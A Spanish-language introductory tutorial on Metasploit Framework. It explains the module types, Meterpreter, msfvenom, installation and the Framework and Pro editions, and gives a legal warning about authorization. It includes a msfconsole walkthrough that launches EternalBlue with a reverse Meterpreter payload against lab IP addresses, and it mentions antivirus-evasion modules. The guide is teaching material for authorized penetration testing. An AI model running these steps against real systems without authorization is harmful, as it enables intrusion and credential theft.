Cuando un pentester o un equipo de seguridad se enfrenta a una auditoría, hay una herramienta que aparece en casi todos los informes de metodología: Metasploit Framework. Lo creó H.D. Moore en 2003 y lo mantiene Rapid7 desde 2009; hoy es el framework de explotación de código abierto más usado del mundo. En esta guía verás qué es, cómo funciona, sus componentes principales y cómo dar tus primeros pasos de forma legal en un entorno de laboratorio.
Aviso legal (obligatorio): Metasploit solo debe usarse en sistemas para los que se tiene autorización expresa y por escrito. En España, el acceso no autorizado a sistemas informáticos está tipificado en los arts. 197 bis y 264 del Código Penal. Usa siempre un laboratorio propio (máquinas virtuales, rangos como Hack The Box o TryHackMe) o un entorno con autorización explícita del propietario.

msfconsole, la interfaz principal de Metasploit. Fuente: Cornstalk, vía Wikimedia Commons (CC BY-SA 3.0)¿Qué es Metasploit Framework?
Metasploit Framework es una plataforma de código abierto para desarrollar, testear y ejecutar exploits contra sistemas informáticos. Rapid7, su empresa mantenedora, lo define como «the world’s most used penetration testing framework» (el framework de pruebas de penetración más utilizado del mundo).
En la práctica, Metasploit reúne en una sola interfaz cientos de exploits, herramientas de reconocimiento, payloads y utilidades de post-explotación que de otro modo habría que manejar por separado. Es la navaja suiza del pentester: sirve tanto para escanear puertos con módulos auxiliares como para ejecutar un payload en memoria sin dejar rastro en disco.
La versión gratuita, Metasploit Framework, es de código abierto (licencia BSD modificada) y está disponible en GitHub (github.com/rapid7/metasploit-framework). Rapid7 también vende Metasploit Pro, una edición de pago con funciones adicionales de automatización e informes. Más adelante hay una tabla comparativa.
¿Para qué se usa Metasploit?
Explotación de vulnerabilidades
El núcleo de Metasploit es su colección de exploits: código que explota vulnerabilidades conocidas en sistemas operativos, servicios de red, aplicaciones web y software de terceros para ganar acceso. Una vez identificada una vulnerabilidad (con Nmap, por ejemplo), Metasploit te deja elegir el exploit apropiado, configurarlo y lanzarlo contra el objetivo.
Post-explotación
Ganar acceso es solo el primer paso. Los módulos de post-explotación de Metasploit permiten escalar privilegios, moverse lateralmente por la red, extraer credenciales, volcar hashes de contraseñas y mantener persistencia. La sesión interactiva de Meterpreter, el payload avanzado de Metasploit, facilita todo esto desde una única consola.
Pentesting estructurado
En un compromiso de pentesting real, Metasploit encaja en la fase de explotación del ciclo estándar: reconocimiento, enumeración, explotación (aquí entra Metasploit), post-explotación e informe. Si quieres el contexto completo, consulta nuestra guía de hacking web o el módulo de reconocimiento web del curso.
Formación y práctica en laboratorio
Metasploit es la herramienta con la que más se practica en plataformas como TryHackMe o Hack The Box. Decenas de máquinas de estas plataformas tienen rutas de solución que pasan por Metasploit, así que en la práctica es casi un requisito para cualquier aspirante a pentester. También es una de las herramientas centrales en la certificación eJPT de INE, el punto de entrada recomendado para quien empieza.
Componentes y tipos de módulos
Metasploit Framework se organiza en módulos. Cada módulo es una pieza de código con un propósito concreto. Conocer los tipos de módulo ayuda a moverse por el framework con soltura.
Tipos de módulo
| Tipo de módulo | Para qué sirve | Ejemplo |
|---|---|---|
| Exploits | Explotar una vulnerabilidad concreta para ejecutar código en el objetivo | exploit/windows/smb/ms17_010_eternalblue |
| Payloads | Código que se ejecuta en el sistema objetivo tras el exploit (shell, Meterpreter…) | payload/windows/x64/meterpreter/reverse_tcp |
| Auxiliary | Escaneo, enumeración, fuzzing, ataques de contraseña; sin payload | auxiliary/scanner/smb/smb_version |
| Post | Post-explotación: escalada de privilegios, pivoting, volcado de credenciales | post/multi/recon/local_exploit_suggester |
| Encoders | Codificar el payload para evadir filtros básicos o antivirus | encoder/x86/shikata_ga_nai |
| Nops | Relleno NOP para estabilizar payloads en exploits de desbordamiento de buffer | nop/x86/single_byte |
| Evasion | Generar ejecutables que evadan soluciones antivirus (módulos añadidos en versiones recientes del Framework) | evasion/windows/windows_defender_exe |
Fuente: Documentación oficial de Metasploit (docs.metasploit.com)
msfconsole
msfconsole es la interfaz principal de Metasploit: una consola interactiva que centraliza el acceso a todos los módulos del framework. Es el punto de partida de cualquier sesión de trabajo. Se lanza con el comando msfconsole desde el terminal y ofrece autocompletado, historial y un entorno de trabajo estructurado por módulo.
Meterpreter
Meterpreter es el payload avanzado e interactivo de Metasploit. A diferencia de una shell estándar, corre completamente en memoria (sin escribir en disco), cifra las comunicaciones con el atacante y ofrece comandos nativos para tareas de post-explotación: subir o descargar archivos, capturar pantallas, volcar hashes, pivotar hacia otras máquinas de la red y bastante más. Es una de las piezas más potentes del framework y también de las más detectadas por los EDR modernos.
msfvenom
msfvenom es la herramienta de línea de comandos de Metasploit para generar y codificar payloads de forma independiente. Permite crear ejecutables, shellcodes, scripts de PowerShell, APKs de Android y otros artefactos para pruebas. Es útil cuando el payload se entrega por otro canal (email, USB, web) y no directamente desde msfconsole.
Base de datos con PostgreSQL
Metasploit puede conectarse a una base de datos PostgreSQL para almacenar resultados de escaneos, hosts descubiertos, credenciales obtenidas y el historial de la sesión. Esto ayuda mucho en compromisos largos, donde llevar la información a mano sería inviable. El comando db_nmap dentro de msfconsole lanza Nmap y guarda los resultados directamente en la base de datos.
Metasploit Framework vs Metasploit Pro
Rapid7 mantiene dos ediciones del producto. Para la mayoría de pentesters individuales y estudiantes, con Metasploit Framework va sobrado. Metasploit Pro está pensado para equipos corporativos y auditores que necesitan automatizar campañas grandes o generar informes ejecutivos.
| Característica | Metasploit Framework | Metasploit Pro |
|---|---|---|
| Precio | Gratuito, código abierto (BSD) | De pago, licencia comercial anual (precio bajo consulta con Rapid7) |
| Interfaz | msfconsole (línea de comandos) | msfconsole + interfaz web |
| Exploits y módulos | Colección completa de código abierto | Los mismos + módulos adicionales exclusivos |
| Automatización y campañas | Manual o via scripts | Asistente de campañas y workflows automatizados |
| Generación de informes | No incluida | Informes ejecutivos y técnicos exportables |
| Phishing y simulación de ataques | Limitado (módulos básicos) | Motor de phishing integrado, simulación de ataques |
| Soporte | Comunidad, GitHub | Soporte técnico de Rapid7 |
| Ideal para | Estudiantes, pentesters individuales, CTFs | Equipos de seguridad corporativos, auditorías a escala |
Fuente: Rapid7 — Metasploit y docs.metasploit.com
Instalación: cómo tener Metasploit listo para practicar
Opción 1: Kali Linux (recomendada para aprender)
Kali Linux incluye Metasploit Framework preinstalado. Es la forma más rápida de empezar: descarga Kali como máquina virtual (desde kali.org), impórtala en VirtualBox o VMware, y Metasploit ya estará disponible. Para actualizarlo:
sudo apt update && sudo apt install metasploit-framework
Opción 2: Instalador oficial (Linux/macOS/Windows)
Rapid7 distribuye un instalador oficial para instalar Metasploit Framework en sistemas que no sean Kali. Está disponible en metasploit.com/download. En sistemas Linux, el instalador configura automáticamente PostgreSQL y los servicios necesarios.
Configurar la base de datos (opcional pero recomendado)
Para activar la persistencia de datos en PostgreSQL, al iniciar msfconsole por primera vez conviene ejecutar:
sudo msfdb init
msfconsole
Una vez dentro, verifica la conexión con db_status. Si responde «Connected to msf. Connection type: postgresql», la base de datos está activa.

Flujo básico de uso: de search a exploit
El flujo estándar en msfconsole para lanzar un exploit contra un objetivo de laboratorio sigue siempre el mismo patrón. Aquí se muestra con el exploit clásico EternalBlue (MS17-010) sobre una máquina Windows vulnerable en un laboratorio propio:
Paso 1: buscar el módulo
msf6 > search eternalblue
Metasploit devuelve todos los módulos relacionados, con el nombre completo del módulo y una descripción. En este caso aparecerá exploit/windows/smb/ms17_010_eternalblue.
Paso 2: seleccionar el módulo
msf6 > use exploit/windows/smb/ms17_010_eternalblue
El prompt cambia a msf6 exploit(windows/smb/ms17_010_eternalblue) > para indicar que el módulo está activo.
Paso 3: ver las opciones
msf6 exploit(...) > show options
Se muestra la tabla de opciones configurables: cuáles son obligatorias (Required: yes), cuáles tienen valor por defecto y cuáles hay que rellenar (como RHOSTS, la IP del objetivo).
Paso 4: configurar las opciones
msf6 exploit(...) > set RHOSTS 192.168.1.100
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(...) > set LHOST 192.168.1.10
RHOSTS es la IP del objetivo; LHOST es la IP de tu máquina atacante (la que recibirá la conexión inversa del payload).
Paso 5: lanzar el exploit
msf6 exploit(...) > exploit
Metasploit envía el exploit y, si tiene éxito, abre una sesión Meterpreter. El prompt cambia a meterpreter > y desde ahí puedes ejecutar comandos de post-explotación.
Para una práctica guiada desde cero, las mejores plataformas para practicar hacking ofrecen máquinas pensadas justo para aprender este flujo de forma legal.
Consejos prácticos y errores comunes al empezar
- Trabaja siempre en un laboratorio controlado, nunca en redes o sistemas que no te pertenezcan. Crea una red de máquinas virtuales con VirtualBox o VMware. Metasploitable 2 y 3 son imágenes pensadas para practicar; las encontrarás en el GitHub de Rapid7.
- Actualiza los módulos con regularidad: la base de datos de exploits de Metasploit cambia sin parar. Usa
sudo apt update && sudo apt upgrade metasploit-frameworken Kali o el comandomsfupdateen instalaciones directas. - Usa
infoantes de lanzar cualquier exploit: el comandoinfodentro de un módulo seleccionado muestra la descripción completa, los sistemas afectados, las referencias CVE y las opciones disponibles. Es el primer paso para entender qué vas a ejecutar. - No olvides
check. Muchos módulos incluyen el comandocheck, que verifica si el objetivo es vulnerable sin ejecutar el exploit. Úsalo siempre que esté disponible para no interrumpir servicios innecesariamente durante un pentest real. - Cuidado con el error clásico de LHOST incorrecto: si el payload es de tipo reverse (el objetivo conecta de vuelta a tu máquina),
LHOSTdebe ser la IP de tu interfaz de red accesible desde el objetivo. Si estás en una VM, puede ser la IP del adaptador en modo puente o solo-anfitrión, no127.0.0.1. - Ten en cuenta que los antivirus detectan Meterpreter. En entornos de producción, los EDR modernos pillan los payloads estándar de Meterpreter casi al instante. En el laboratorio funciona bien; en un pentest real de red team hacen falta técnicas de evasión adicionales y herramientas especializadas.
Alternativas a Metasploit
Metasploit domina el espacio, pero no es la única opción. Conocer las alternativas ayuda a elegir la herramienta correcta según el contexto:
- Cobalt Strike: la alternativa comercial más usada por equipos de red team profesionales. Precio elevado (de pago por licencia); no está al alcance de estudiantes, pero es la referencia en operaciones avanzadas de red team. Lo desarrolla Fortra (antes HelpSystems).
- Core Impact: plataforma comercial de pentesting de Core Security (Fortra). Orientada a auditorías corporativas con flujos de trabajo guiados y base de exploits propia.
- Sliver: framework de código abierto de BishopFox, pensado como alternativa open source a Cobalt Strike para operaciones de red team. Se desarrolla activamente y soporta varios protocolos de C2. Disponible en github.com/BishopFox/sliver.
- Nmap + scripts NSE: para la fase de reconocimiento y enumeración, Nmap con sus scripts NSE (Nmap Scripting Engine) cubre buena parte de lo que hacen los módulos auxiliary de Metasploit. Menos integrado, pero más ligero y específico. Consulta el módulo de reconocimiento web para ver cómo se combina con otras técnicas.
- Burp Suite: para vulnerabilidades de aplicaciones web específicamente, sigue siendo la herramienta de referencia. Metasploit tiene módulos web, pero Burp Suite ofrece una experiencia mucho más profunda en ese dominio concreto.
Vídeo recomendado
Para ver el flujo completo en acción, este tutorial introductorio de HackerSploit explica los conceptos básicos de Metasploit (módulos, exploits y payloads) de forma clara:
Preguntas frecuentes
¿Es Metasploit gratuito?
Sí. Metasploit Framework es gratuito y de código abierto (licencia BSD modificada). Puedes descargarlo, usarlo y modificarlo sin coste. Rapid7 también ofrece Metasploit Pro, una edición comercial de pago con funciones adicionales orientadas a equipos corporativos (interfaz web, informes automáticos, simulación de phishing). Para aprender y para la mayoría de pentesters individuales, la versión gratuita sobra.
¿Es legal usar Metasploit?
La herramienta en sí es legal; lo que determina la legalidad es el uso que se hace de ella. Usar Metasploit en tus propias máquinas virtuales, en plataformas de práctica (TryHackMe, HTB) o en un compromiso de pentesting con autorización firmada es completamente legal. Usarlo contra sistemas ajenos sin permiso es un delito en España (arts. 197 bis y 264 CP) y en la mayoría de jurisdicciones. El marco legal no distingue entre «solo estaba mirando» o «solo eché un vistazo»: el acceso no autorizado ya es suficiente.
¿Necesito Kali Linux para usar Metasploit?
No. Metasploit Framework funciona en cualquier sistema Linux, macOS y Windows (aunque en Windows la experiencia tiene más fricción). Kali Linux es la opción más recomendada para aprender porque viene con Metasploit preinstalado junto con el resto de herramientas de pentesting, lo que evita problemas de dependencias y configuración. Si ya tienes Ubuntu o Debian, puedes instalar Metasploit directamente con apt o usando el instalador de Rapid7.
¿Qué es Meterpreter exactamente?
Meterpreter es el payload avanzado de Metasploit: un agente que corre en la memoria del sistema objetivo (sin escribir en disco) y que da una sesión interactiva con capacidades muy por encima de una shell convencional. Desde una sesión Meterpreter puedes navegar el sistema de archivos, capturar pantallas y pulsaciones de teclado, volcar hashes de contraseñas, escalar privilegios, pivotar hacia otras máquinas de la red y bastante más. El tráfico entre tu máquina y el objetivo va cifrado. Por eso es una de las piezas más potentes del framework y también una de las más estudiadas por los equipos de defensa.
¿Cuál es la diferencia entre Metasploit Framework y Metasploit Pro?
Metasploit Framework es la versión gratuita y de código abierto: acceso completo a todos los exploits, módulos y herramientas desde la línea de comandos (msfconsole). Metasploit Pro es la edición comercial de Rapid7 que añade una interfaz web, automatización de campañas (lanzar exploits contra múltiples objetivos de forma orquestada), generación de informes ejecutivos y técnicos, motor de phishing integrado y soporte técnico oficial. En la práctica: si eres estudiante, pentester individual o participas en CTFs, Framework es todo lo que necesitas. Si gestionas auditorías a escala para clientes corporativos o formas parte de un equipo de red team, Pro puede justificar la inversión.
